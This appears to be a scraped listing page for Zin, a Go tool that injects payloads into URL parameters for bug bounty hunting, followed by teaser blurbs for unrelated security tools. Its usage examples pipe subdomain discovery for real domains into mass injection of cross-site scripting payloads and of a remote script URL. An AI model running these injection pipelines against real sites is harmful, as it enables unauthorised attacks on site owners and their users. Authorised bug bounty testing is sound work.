Zin is a payload Injector For Bugbounties Written In Go.
Features
Install
$ go get -u github.com/ethicalhackingplayground/Zin
New Features
Arguments
May the bounties come
-c int
the concurrency (default 20)
-g string
grep the response for any matches
-p string
the payload to be used
-pL string
the list of payloads to be used
-s int
filter by status codes (default 200)
$ subfinder uber.com | gau | grep “=http” | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g “SUP3R_S3cret_1337_K3y”
$ subfinder uber.com | gau| Zin -c 80 -p ‘”><script>alert(matchforthis)script>’ -g “matchforthis”
$ cat hosts | gau | grep “&” | Zin -c 80 -pL <payloadfile>
$ subfinder -dL domains –silent | gau | Zin -c 80 -p <payload>
$ echo “google.com” | gau | grep “&” | Zin -c 80 -p ‘”><script>alert(matchthis)</script<“‘ -g “matchthis”
$ cat hosts | gau | Zin -c 80 -p <payload>
EDR bypass technology is not just for attackers. Many malware now have EDR bypass capabilities,…
Welcome to Better-Sliver, a fork of the Sliver project. This fork is intended to be…
This is the repository for the Introduction to Fuzzing Lab run by ACM Cyber at…
This repository provides a Proof of Concept (PoC) for testing various vulnerabilities in the Apache…
A GPU-accelerated cross-platform terminal emulator and multiplexer written by @wez and implemented in Rust Getting…
一句话介绍工具: AutorizePro 是一款创新性的内置AI分析模块的专注于越权检测的 Burp 插件 (已有多个白帽反馈用工具嘎嘎挖到src洞, 每周末更新, 欢迎Star🌟以便持续跟踪项目最新版本功能) 工具背景 越权漏洞在黑盒测试、SRC挖掘中几乎是必测的一项,但手工逐个测试越权漏洞往往会耗费大量时间。 而自动化工具又因为接口的多样化,难以制定一个全面的检测逻辑而存在大量误报, 基于此产生了 AI辅助分析的检测工具 ➡️ AutorizePro…